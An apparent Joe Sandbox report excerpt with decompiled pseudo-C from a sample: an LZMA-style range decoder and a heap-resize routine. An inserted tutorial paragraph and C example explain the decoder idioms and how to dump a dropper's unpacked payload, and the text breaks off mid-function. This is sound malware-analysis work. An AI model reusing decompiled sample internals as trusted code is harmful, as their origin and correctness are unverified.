                              																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x55e + (((_t301 & 0x00000001 | 0x00000002) << _t251) - _t301) * 2;
                              																L104:
                              																_t207 = 1;
                              																do {
                              																	_t171 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t207 * 2) & 0x0000ffff;
                              																	if(_t290 >= 0x1000000) {
                              																		goto L108;
                              																	} else {
                              																		if(_t344 >=  *(_t351 + 0x10)) {
                              																			goto L2;
                              																		} else {
                              																			_t290 = _t290 << 8;
                              																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
                              																			_t344 =  &(_t344[1]);
                              																			goto L108;
                              																		}
                              																	}
                              																	goto L113;
                              																	L108:
                              																	_t310 = (_t290 >> 0xb) * _t171;
                              																	if(_t325 >= _t310) {
                              																		_t290 = _t290 - _t310;
                              																		_t325 = _t325 - _t310;
                              																		_t207 = _t207 + _t207 + 1;
                              																	} else {
                              																		_t290 = _t310;
                              																		_t207 = _t207 + _t207;
                              																	}
                              																	_t251 = _t251 - 1;
                              																} while (_t251 != 0);
                              																goto L21;
                              															}
                              														}
                              													}
                              												} else {
                              													_t162 =  *(_t351 + 0x28);
                              													continue;
                              												}
                              											} else {
                              												if(_t162 >=  *(_t351 + 0x10)) {
                              													goto L2;
                              												} else {
                              													_t290 = _t290 << 8;
                              													_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
                              													 *(_t351 + 0x28) =  &(_t162[1]);
                              													goto L79;
                              												}
                              											}
                              											goto L113;
                              										}
                              									}
                              								} else {
                              									if(_t225 >=  *(_t351 + 0x10)) {
                              										goto L2;
                              									} else {
                              										_t288 = _t288 << 8;
                              										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
                              										 *(_t351 + 0x28) =  &(_t225[1]);
                              										goto L67;
                              									}
                              								}
                              							}
                              						} else {
                              							if(_t225 >=  *(_t351 + 0x10)) {
                              								goto L2;
                              							} else {
                              								_t284 = _t284 << 8;
                              								_t322 = _t322 << 0x00000008 |  *_t225 & 0x000000ff;
                              								_t225 =  &(_t225[1]);
                              								 *(_t351 + 0x28) = _t225;
                              								goto L39;
                              							}
                              						}
                              					} else {
                              						_t291 = _t153;
                              						 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0xe6c;
                              						if(_t292[0xc] != 0 || _t292[0xb] != 0) {
                              							_t265 = _t292[9];
                              							if(_t265 == 0) {
                              								_t265 = _t292[0xa];
                              							}
                              							 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + ((( *(_t292[5] + _t265 - 1) & 0x000000ff) >> 8 -  *_t292) + (((0x00000001 << _t292[1]) - 0x00000001 & _t292[0xb]) <<  *_t292)) * 0x600;
                              						}
                              						if(_t340 >= 7) {
                              							_t270 = _t292[9];
                              							_t215 = _t292[0xe];
                              							if(_t270 >= _t215) {
                              								_t190 = 0;
                              							} else {
                              								_t190 = _t292[0xa];
                              							}
                              							_t271 =  *(_t292[5] - _t215 + _t270 + _t190) & 0x000000ff;
                              							_t216 = 0x100;
                              							_t319 = 1;
                              							while(1) {
                              								_t272 = _t271 + _t271;
                              								_t192 = _t216 & _t272;
                              								 *(_t351 + 0x20) = _t272;
                              								 *(_t351 + 0x18) =  *( *((intOrPtr*)(_t351 + 0x14)) + (_t192 + _t319 + _t216) * 2) & 0x0000ffff;
                              								if(_t291 >= 0x1000000) {
                              									goto L31;
                              								}
                              								_t279 =  *(_t351 + 0x28);
                              								if(_t279 >=  *(_t351 + 0x10)) {
                              									goto L2;
                              								} else {
                              									_t291 = _t291 << 8;
                              									_t321 = _t321 << 0x00000008 |  *_t279 & 0x000000ff;
                              									 *(_t351 + 0x28) =  &(_t279[1]);
                              									goto L31;
                              								}
                              								goto L113;
                              								L31:
                              								_t278 = (_t291 >> 0xb) *  *(_t351 + 0x18);
                              								if(_t321 >= _t278) {
                              									_t290 = _t291 - _t278;
                              									_t321 = _t321 - _t278;
                              									_t319 = _t319 + _t319 + 1;
                              								} else {
                              									_t290 = _t278;
                              									_t319 = _t319 + _t319;
                              									_t192 =  !_t192;
                              								}
                              								_t216 = _t216 & _t192;
                              								if(_t319 >= 0x100) {
                              									goto L19;
                              								} else {
                              									_t271 =  *(_t351 + 0x20);
                              									continue;
                              								}
                              								goto L113;
                              							}
                              						} else {
                              							_t281 = 1;
                              							do {
                              								_t320 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t281 * 2) & 0x0000ffff;
                              								if(_t291 >= 0x1000000) {
                              									goto L15;
                              								} else {
                              									_t197 =  *(_t351 + 0x28);
                              									if(_t197 >=  *(_t351 + 0x10)) {
                              										goto L2;
                              									} else {
                              										_t291 = _t291 << 8;
                              										_t321 = _t321 << 0x00000008 |  *_t197 & 0x000000ff;
                              										 *(_t351 + 0x28) =  &(_t197[1]);
                              										goto L15;
                              									}
                              								}
                              								goto L113;
                              								L15:
                              								_t196 = (_t291 >> 0xb) * _t320;
                              								if(_t321 >= _t196) {
                              									_t291 = _t291 - _t196;
                              									_t321 = _t321 - _t196;
                              									_t281 = _t281 + _t281 + 1;
                              								} else {
                              									_t291 = _t196;
                              									_t281 = _t281 + _t281;
                              								}
                              							} while (_t281 < 0x100);
                              							L19:
                              							 *(_t351 + 0x1c) = 1;
                              							L20:
                              							_t344 =  *(_t351 + 0x28);
                              							L21:
                              							if(_t290 >= 0x1000000 || _t344 <  *(_t351 + 0x10)) {
                              								return  *(_t351 + 0x1c);
                              							} else {
                              								goto L2;
                              							}
                              						}
                              					}
                              				} else {
                              					_t199 =  *(_t351 + 0x28);
                              					if(_t199 <  *(_t351 + 0x10)) {
                              						_t283 = _t283 << 8;
                              						_t321 = _t321 << 0x00000008 |  *_t199 & 0x000000ff;
                              						 *(_t351 + 0x28) =  &(_t199[1]);
                              						goto L4;
                              					} else {
                              						L2:
                              						return 0;
                              					}
                              				}
                              				L113:
                              			}
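What the decompiled block above implements is an LZMA-style range decoder, and recognising it saves reversing time: the repeated `if (range < 0x1000000) { range <<= 8; code = code << 8 | *p++ }` refills, `bound = (range >> 0xb) * prob16` followed by a `code >= bound` branch, the `m = m + m + 1` bit-tree loops that stop at 0x100 (literal) and 0x40 (position slot), the `0x100`-offset matched-literal loop guarded by `_t340 >= 7`, and the branch-free direct-bit step at L102 are the LZMA SDK decoder idioms, not custom cryptography. The encoder/decoder pair below is an added example written for this page, not code from the sample or from Joe Sandbox; it uses the same constants (1<<24 refill threshold, 11-bit probability scaling, 16-bit probabilities, 5-bit adaptation) and round-trips a constructed message plus a 13-bit direct value. All names, the message and the direct value are this example's own assumptions.

```c
/* Added example, not the sample's code: a minimal LZMA-style binary range coder
 * (encoder + decoder) using the constants visible in the decompiled block above. */
#include <stdint.h>
#include <stddef.h>

#define kTopValue      (1u << 24)            /* 0x1000000: refill threshold */
#define kNumModelBits  11                    /* the ">> 0xb" probability scaling */
#define kBitModelTotal (1u << kNumModelBits) /* 0x800 */
#define kNumMoveBits   5                     /* adaptation speed */
typedef uint16_t Prob;                       /* 16-bit probabilities: the "& 0x0000ffff" loads */

/* ---- encoder: 33-bit 'low' with LZMA carry propagation through 'cache' ---- */
typedef struct { uint64_t low; uint32_t range; uint8_t cache; uint64_t cache_size;
                 uint8_t *out; size_t pos, cap; } RcEnc;

static void rc_enc_init(RcEnc *e, uint8_t *out, size_t cap) {
    e->low = 0; e->range = 0xFFFFFFFFu; e->cache = 0; e->cache_size = 1;
    e->out = out; e->pos = 0; e->cap = cap;
}
static void rc_shift_low(RcEnc *e) {
    if ((uint32_t)e->low < 0xFF000000u || (e->low >> 32) != 0) {
        uint8_t carry = (uint8_t)(e->low >> 32), b = e->cache;
        do {                                 /* flush cache byte and any held-back 0xFFs */
            if (e->pos < e->cap) e->out[e->pos] = (uint8_t)(b + carry);
            e->pos++; b = 0xFF;
        } while (--e->cache_size != 0);
        e->cache = (uint8_t)(e->low >> 24);
    }
    e->cache_size++;
    e->low = (e->low & 0x00FFFFFFu) << 8;
}
static void rc_enc_normalize(RcEnc *e) {
    while (e->range < kTopValue) { e->range <<= 8; rc_shift_low(e); }
}
static void rc_encode_bit(RcEnc *e, Prob *p, unsigned bit) {
    uint32_t bound = (e->range >> kNumModelBits) * *p;
    if (bit == 0) { e->range = bound; *p += (kBitModelTotal - *p) >> kNumMoveBits; }
    else { e->low += bound; e->range -= bound; *p -= *p >> kNumMoveBits; }
    rc_enc_normalize(e);
}
static void rc_encode_direct(RcEnc *e, uint32_t value, unsigned nbits) {
    while (nbits--) {                        /* MSB first */
        e->range >>= 1;
        if ((value >> nbits) & 1) e->low += e->range;
        rc_enc_normalize(e);
    }
}
static size_t rc_enc_flush(RcEnc *e) {
    for (int i = 0; i < 5; i++) rc_shift_low(e);
    return e->pos;                           /* bytes required; may exceed cap */
}

/* ---- decoder ---- */
typedef struct { uint32_t range, code; const uint8_t *in; size_t pos, len; int truncated; } RcDec;

static int rc_dec_init(RcDec *d, const uint8_t *in, size_t len) {
    if (len < 5 || in[0] != 0) return 0;     /* a valid stream starts with a zero byte */
    d->range = 0xFFFFFFFFu; d->code = 0; d->in = in; d->len = len; d->pos = 1; d->truncated = 0;
    for (int i = 0; i < 4; i++) d->code = (d->code << 8) | in[d->pos++];
    return 1;
}
/* The refill seen all over the decompiled function:
 * "if (range < 0x1000000) { range <<= 8; code = code << 8 | *p++; }".
 * There, exhausted input means "return 0" (need more data); here it is flagged. */
static void rc_dec_normalize(RcDec *d) {
    if (d->range < kTopValue) {
        uint8_t b = 0;
        if (d->pos < d->len) b = d->in[d->pos]; else d->truncated = 1;
        d->pos++; d->range <<= 8; d->code = (d->code << 8) | b;
    }
}
/* "bound = (range >> 0xb) * prob; code >= bound ? take the 1 branch : range = bound" */
static unsigned rc_decode_bit(RcDec *d, Prob *p) {
    rc_dec_normalize(d);
    uint32_t bound = (d->range >> kNumModelBits) * *p;
    if (d->code < bound) { d->range = bound; *p += (kBitModelTotal - *p) >> kNumMoveBits; return 0; }
    d->range -= bound; d->code -= bound; *p -= *p >> kNumMoveBits; return 1;
}
/* Equiprobable bits, in the branch-free shape of label L102 above:
 * "range >>= 1; code -= (((code - range) >> 31) - 1) & range" */
static uint32_t rc_decode_direct(RcDec *d, unsigned nbits) {
    uint32_t v = 0;
    while (nbits--) {
        rc_dec_normalize(d);
        d->range >>= 1;
        uint32_t mask = ((d->code - d->range) >> 31) - 1u;  /* all ones iff code >= range */
        d->code -= mask & d->range;
        v = (v << 1) | (mask & 1u);
    }
    return v;
}
/* Bit-tree coding: the "m = m + m + 1 ... while (m < 0x100)" loops above. */
static void bittree_encode(RcEnc *e, Prob *probs, unsigned nbits, uint32_t sym) {
    uint32_t m = 1;
    while (nbits--) { unsigned bit = (sym >> nbits) & 1; rc_encode_bit(e, &probs[m], bit); m = (m << 1) | bit; }
}
static uint32_t bittree_decode(RcDec *d, Prob *probs, unsigned nbits) {
    uint32_t limit = 1u << nbits, m = 1;
    do { m = (m << 1) | rc_decode_bit(d, &probs[m]); } while (m < limit);
    return m - limit;
}

/* Constructed demo input: 16 literals through an 8-bit tree, then 13 direct bits. */
static const char kMsg[] = "LZMA range coder";
#define kDirectValue 0x1ABCu
#define kDirectBits  13
static void probs_init(Prob *p, size_t n) { for (size_t i = 0; i < n; i++) p[i] = kBitModelTotal >> 1; }

size_t demo_encode(uint8_t *out, size_t cap) {
    Prob probs[256]; probs_init(probs, 256);
    RcEnc e; rc_enc_init(&e, out, cap);
    for (size_t i = 0; i < sizeof kMsg - 1; i++) bittree_encode(&e, probs, 8, (uint8_t)kMsg[i]);
    rc_encode_direct(&e, kDirectValue, kDirectBits);
    return rc_enc_flush(&e);
}
size_t demo_encoded_size(void) { uint8_t b[64]; return demo_encode(b, sizeof b); }
/* 1 if decoding reproduces the constructed input exactly without over-reading. */
int demo_roundtrip(void) {
    uint8_t buf[64]; size_t n = demo_encode(buf, sizeof buf);
    if (n > sizeof buf) return 0;
    Prob probs[256]; probs_init(probs, 256);
    RcDec d; if (!rc_dec_init(&d, buf, n)) return 0;
    for (size_t i = 0; i < sizeof kMsg - 1; i++)
        if (bittree_decode(&d, probs, 8) != (uint8_t)kMsg[i]) return 0;
    return rc_decode_direct(&d, kDirectBits) == kDirectValue && !d.truncated;
}
```

Two practical points follow from the shape of the decompiled routine. First, every `goto L2` path returns 0 as soon as the input pointer (`*(_t351 + 0x28)`) reaches the buffer end (`*(_t351 + 0x10)`), while the normal exits return the value at `_t351 + 0x1c` (1 or 2) and one truncated path returns 3; that is the shape of a resumable, streaming decoder with its state kept in the structure at `_t351`, not a one-shot call. Second, when a decoder like this sits in a dropper or self-extracting stub, the decompressed payload is written to an output buffer as the decoder runs, so breaking after it completes and dumping that buffer is normally faster than reversing the state machine itself.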
(Instruction address column from the original side-by-side view, 0x004126b7 through 0x00412cb4; the per-line pairing with the decompiled code above did not survive extraction.)
                              0x00412bf6
                              0x00412be8
                              0x00412b68
                              0x00412b68
                              0x00000000
                              0x00412b68
                              0x00412b28
                              0x00412b2c
                              0x00000000
                              0x00412b32
                              0x00412b38
                              0x00412b3b
                              0x00412b3e
                              0x00000000
                              0x00412b3e
                              0x00412b2c
                              0x00000000
                              0x00412b26
                              0x00412b20
                              0x00412a73
                              0x00412a77
                              0x00000000
                              0x00412a7d
                              0x00412a83
                              0x00412a86
                              0x00412a89
                              0x00000000
                              0x00412a89
                              0x00412a77
                              0x00412a71
                              0x004128d6
                              0x004128da
                              0x00000000
                              0x004128e0
                              0x004128e6
                              0x004128e9
                              0x004128eb
                              0x004128ec
                              0x00000000
                              0x004128ec
                              0x004128da
                              0x00412730
                              0x00412730
                              0x0041273f
                              0x00412743
                              0x0041274b
                              0x00412750
                              0x00412752
                              0x00412752
                              0x00412782
                              0x00412782
                              0x00412789
                              0x0041281c
                              0x0041281f
                              0x00412824
                              0x0041282b
                              0x00412826
                              0x00412826
                              0x00412826
                              0x00412834
                              0x00412838
                              0x0041283d
                              0x00412842
                              0x00412846
                              0x0041284a
                              0x0041284c
                              0x0041285a
                              0x00412864
                              0x00000000
                              0x00000000
                              0x00412866
                              0x0041286e
                              0x00000000
                              0x00412874
                              0x0041287a
                              0x0041287d
                              0x00412880
                              0x00000000
                              0x00412880
                              0x00000000
                              0x00412884
                              0x00412889
                              0x00412890
                              0x0041289a
                              0x0041289c
                              0x0041289e
                              0x00412892
                              0x00412892
                              0x00412894
                              0x00412896
                              0x00412896
                              0x004128a2
                              0x004128aa
                              0x00000000
                              0x004128b0
                              0x004128b0
                              0x00000000
                              0x004128b0
                              0x00000000
                              0x004128aa
                              0x0041278f
                              0x0041278f
                              0x004127a0
                              0x004127a4
                              0x004127ae
                              0x00000000
                              0x004127b0
                              0x004127b0
                              0x004127b8
                              0x00000000
                              0x004127be
                              0x004127c4
                              0x004127c7
                              0x004127ca
                              0x00000000
                              0x004127ca
                              0x004127b8
                              0x00000000
                              0x004127ce
                              0x004127d3
                              0x004127d8
                              0x004127e0
                              0x004127e2
                              0x004127e4
                              0x004127da
                              0x004127da
                              0x004127dc
                              0x004127dc
                              0x004127e8
                              0x004127f0
                              0x004127f0
                              0x004127f8
                              0x004127f8
                              0x004127fc
                              0x00412802
                              0x00412819
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00412802
                              0x00412789
                              0x004126f8
                              0x004126f8
                              0x00412700
                              0x00412714
                              0x00412717
                              0x0041271a
                              0x00000000
                              0x00412705
                              0x00412705
                              0x0041270b
                              0x0041270b
                              0x00412700
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                              • Instruction ID: 16771a17edc265a66ec67cf10f30b53a928448ec08439b5136306a35d4d76ba5
                              • Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                              • Instruction Fuzzy Hash: 3D023C72A042114BD719CE18C6802BDBBE2FBD5350F150A3FE4A6D7684D7B898E8C799
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004162A6(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
                              				signed int _v8;
                              				signed char _v12;
                              				intOrPtr _v16;
                              				intOrPtr _t186;
                              				void* _t187;
                              				signed int _t188;
                              				signed int* _t189;
                              				intOrPtr _t191;
                              				signed int* _t192;
                              				signed int* _t193;
                              				signed char _t194;
                              				intOrPtr _t195;
                              				intOrPtr* _t196;
                              				signed int _t199;
                              				signed int _t202;
                              				signed int _t207;
                              				signed int _t209;
                              				signed int _t218;
                              				signed int _t221;
                              				signed int* _t222;
                              				signed int _t227;
                              				intOrPtr _t228;
                              				intOrPtr _t229;
                              				intOrPtr _t230;
                              				char _t233;
                              				signed int _t234;
                              				signed char _t235;
                              				signed int* _t237;
                              				signed int* _t239;
                              				signed int* _t244;
                              				signed int* _t245;
                              				signed char _t250;
                              				intOrPtr _t256;
                              				signed int _t257;
                              				char _t258;
                              				char _t259;
                              				signed char _t260;
                              				signed int* _t262;
                              				signed int* _t267;
                              				signed int* _t268;
                              				char* _t270;
                              				signed int _t274;
                              				unsigned int _t275;
                              				intOrPtr _t277;
                              				unsigned int _t278;
                              				intOrPtr* _t280;
                              				void* _t281;
                              				signed char _t290;
                              				signed int _t292;
                              				signed char _t295;
                              				signed int _t298;
                              				signed int _t302;
                              				signed int* _t304;
                              
                              				_t222 = _a4;
                              				_t280 = _a8;
                              				_t186 =  *((intOrPtr*)(_t222 + 0x10));
                              				_t292 = _a12 + 0x00000017 & 0xfffffff0;
                              				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
                              				_v16 = _t274 * 0x204 + _t186 + 0x144;
                              				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
                              				_a12 = _t227;
                              				_t194 =  *(_t227 + _t280 - 4);
                              				_t281 = _t227 + _t280 - 4;
                              				_v8 = _t194;
                              				if(_t292 <= _t227) {
                              					if(__eflags < 0) {
                              						_t195 = _a8;
                              						_a12 = _a12 - _t292;
                              						_t228 = _t292 + 1;
                              						 *((intOrPtr*)(_t195 - 4)) = _t228;
                              						_t196 = _t195 + _t292 - 4;
                              						_a8 = _t196;
                              						_t295 = (_a12 >> 4) - 1;
                              						 *((intOrPtr*)(_t196 - 4)) = _t228;
                              						__eflags = _t295 - 0x3f;
                              						if(_t295 > 0x3f) {
                              							_t295 = 0x3f;
                              						}
                              						__eflags = _v8 & 0x00000001;
                              						if((_v8 & 0x00000001) == 0) {
                              							_t298 = (_v8 >> 4) - 1;
                              							__eflags = _t298 - 0x3f;
                              							if(_t298 > 0x3f) {
                              								_t298 = 0x3f;
                              							}
                              							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
                              							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
                              								__eflags = _t298 - 0x20;
                              								if(_t298 >= 0x20) {
                              									_t128 = _t298 - 0x20; // -32
                              									_t130 = _t186 + 4; // 0x4
                              									_t244 = _t298 + _t130;
                              									_t199 =  !(0x80000000 >> _t128);
                              									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
                              									 *_t244 =  *_t244 - 1;
                              									__eflags =  *_t244;
                              									if( *_t244 == 0) {
                              										_t245 = _a4;
                              										_t138 = _t245 + 4;
                              										 *_t138 =  *(_t245 + 4) & _t199;
                              										__eflags =  *_t138;
                              									}
                              								} else {
                              									_t304 = _t298 + _t186 + 4;
                              									_t202 =  !(0x80000000 >> _t298);
                              									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
                              									 *_t304 =  *_t304 - 1;
                              									__eflags =  *_t304;
                              									if( *_t304 == 0) {
                              										 *_a4 =  *_a4 & _t202;
                              									}
                              								}
                              								_t196 = _a8;
                              							}
                              							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
                              							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
                              							_t302 = _a12 + _v8;
                              							_a12 = _t302;
                              							_t295 = (_t302 >> 4) - 1;
                              							__eflags = _t295 - 0x3f;
                              							if(_t295 > 0x3f) {
                              								_t295 = 0x3f;
                              							}
                              						}
                              						_t229 = _v16;
                              						_t230 = _t229 + _t295 * 8;
                              						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
                              						 *((intOrPtr*)(_t196 + 8)) = _t230;
                              						 *((intOrPtr*)(_t230 + 4)) = _t196;
                              						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
                              						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
                              						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
                              							_t233 =  *(_t295 + _t186 + 4);
                              							__eflags = _t295 - 0x20;
                              							_a11 = _t233;
                              							_t234 = _t233 + 1;
                              							__eflags = _t234;
                              							 *(_t295 + _t186 + 4) = _t234;
                              							if(_t234 >= 0) {
                              								__eflags = _a11;
                              								if(_a11 == 0) {
                              									_t237 = _a4;
                              									_t176 = _t237 + 4;
                              									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
                              									__eflags =  *_t176;
                              								}
                              								_t189 = _t186 + 0xc4 + _t274 * 4;
                              								_t235 = _t295 - 0x20;
                              								_t275 = 0x80000000;
                              							} else {
                              								__eflags = _a11;
                              								if(_a11 == 0) {
                              									_t239 = _a4;
                              									 *_t239 =  *_t239 | 0x80000000 >> _t295;
                              									__eflags =  *_t239;
                              								}
                              								_t189 = _t186 + 0x44 + _t274 * 4;
                              								_t275 = 0x80000000;
                              								_t235 = _t295;
                              							}
                              							 *_t189 =  *_t189 | _t275 >> _t235;
                              							__eflags =  *_t189;
                              						}
                              						_t188 = _a12;
                              						 *_t196 = _t188;
                              						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
                              					}
                              					L52:
                              					_t187 = 1;
                              					return _t187;
                              				}
                              				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
                              					return 0;
                              				} else {
                              					_t250 = (_v8 >> 4) - 1;
                              					_v12 = _t250;
                              					if(_t250 > 0x3f) {
                              						_t250 = 0x3f;
                              						_v12 = _t250;
                              					}
                              					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
                              						if(_t250 >= 0x20) {
                              							_t267 = _v12 + _t186 + 4;
                              							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
                              							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
                              							 *_t267 =  *_t267 - 1;
                              							__eflags =  *_t267;
                              							if( *_t267 == 0) {
                              								_t268 = _a4;
                              								_t44 = _t268 + 4;
                              								 *_t44 =  *(_t268 + 4) & _t218;
                              								__eflags =  *_t44;
                              							}
                              						} else {
                              							_t270 = _v12 + _t186 + 4;
                              							_t221 =  !(0x80000000 >> _t250);
                              							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
                              							 *_t270 =  *_t270 - 1;
                              							if( *_t270 == 0) {
                              								 *_a4 =  *_a4 & _t221;
                              							}
                              						}
                              					}
                              					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
                              					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
                              					_v8 = _v8 + _a12 - _t292;
                              					if(_v8 <= 0) {
                              						_t277 = _a8;
                              					} else {
                              						_t290 = (_v8 >> 4) - 1;
                              						_t256 = _a8 + _t292 - 4;
                              						if(_t290 > 0x3f) {
                              							_t290 = 0x3f;
                              						}
                              						_t207 = _v16 + _t290 * 8;
                              						_a12 = _t207;
                              						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
                              						_t209 = _a12;
                              						 *(_t256 + 8) = _t209;
                              						 *((intOrPtr*)(_t209 + 4)) = _t256;
                              						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
                              						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
                              							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
                              							_a15 = _t258;
                              							_t259 = _t258 + 1;
                              							 *((char*)(_t290 + _t186 + 4)) = _t259;
                              							if(_t259 >= 0) {
                              								__eflags = _a15;
                              								if(_a15 == 0) {
                              									_t84 = _t290 - 0x20; // -33
                              									_t262 = _a4;
                              									_t86 = _t262 + 4;
                              									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
                              									__eflags =  *_t86;
                              								}
                              								_t193 = _t186 + 0xc4 + _t274 * 4;
                              								_t91 = _t290 - 0x20; // -33
                              								_t260 = _t91;
                              								_t278 = 0x80000000;
                              							} else {
                              								if(_a15 == 0) {
                              									 *_a4 =  *_a4 | 0x80000000 >> _t290;
                              								}
                              								_t193 = _t186 + 0x44 + _t274 * 4;
                              								_t278 = 0x80000000;
                              								_t260 = _t290;
                              							}
                              							 *_t193 =  *_t193 | _t278 >> _t260;
                              						}
                              						_t277 = _a8;
                              						_t257 = _v8;
                              						_t192 = _t277 + _t292 - 4;
                              						 *_t192 = _t257;
                              						 *(_t257 + _t192 - 4) = _t257;
                              					}
                              					_t191 = _t292 + 1;
                              					 *((intOrPtr*)(_t277 - 4)) = _t191;
                              					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
                              					goto L52;
                              				}
                              			}

                              0x0041642f
                              0x00416433
                              0x00416435
                              0x00416435
                              0x0041643e
                              0x00416441
                              0x00416444
                              0x00000000
                              0x00416444

                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                              • Instruction ID: ff32ffadf5a964956f90e5d4d875ac86f6d3b74cc38b5144254d495ff0ae7514
                              • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                              • Instruction Fuzzy Hash: D3B18E75A0020ADFDB15CF04C5D0AE9BBA2BF58318F25C19EC85A4B346C735EE82CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00403A01() {
                              				void* _t37;
                              				signed int _t38;
                              				signed int _t72;
                              
                              				_t72 = 0;
                              				do {
